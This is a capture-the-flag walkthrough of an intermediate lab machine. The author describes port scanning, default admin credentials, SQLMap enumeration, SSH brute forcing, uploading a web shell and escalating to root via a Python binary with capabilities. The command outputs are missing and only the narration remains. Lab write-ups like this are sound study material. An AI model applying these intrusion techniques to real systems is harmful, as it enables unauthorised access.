This box is described as "Intermediate" and the description states:  "Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root)."

I'll admit, I'm getting a little worn out on the multiple web serving troll ports.  It's basically the same box recycled with a different twist.  That being said, the privilege escalation was excellent.  There are multiple entrances for a low privilege shell and I cover two. 

We kick off with Nmap:


Lots of open ports like the previous boxes from this author.  When we search port 80 with Nikto, we find:

When we access it from the web browser, we find:


Scrolling down, we find:


Moving over to the admin page, we try admin admin :


We're in!  I attempt to upload a shell:


But that errors out.  When I look in the address, I see what could be SQL Injection:


Mind you, this is a deviation and it goes nowhere but if you want to play around with it, this is how it starts:


We capture the post in Burp and we insert it into a file.  We fire up SQLMap:


We find a database:


Let's enumerate the database:


We find a table and we get the column info:


Let's dump the table:


And we find what we already know when cracking the hash, the username is admin and the password is admin.


Circling back -- looking at the format of the pages, I guess that maybe admin_edit.php exists:


I attempt to upload a shell:


When I try to add it:


We get an error. 

Meanwhile, I'm brute forcing SSH and I find:


That's our first in, I'm not sure that was intended.  We SSH over to the box:


As I'm hunting around the various web servers, I find:


I think this was probably the intended entry:


We upload our shell:


Note the location of the file but recognize that it's NOT on this web server, it's the server running on port 8715:


With our handler setup:


Getting in as www-data buys us nothing.  Back to katana, I search for files with capabilities and I uncover:


Which leads us to:

With Python2.7, we can execute a shell for root.  We get the flag and it's game over!  I really like the privilege escalation, that was solid.  Took me a bit to figure that out because it doesn't show up on privilege escalation scripts -- or at least those I ran.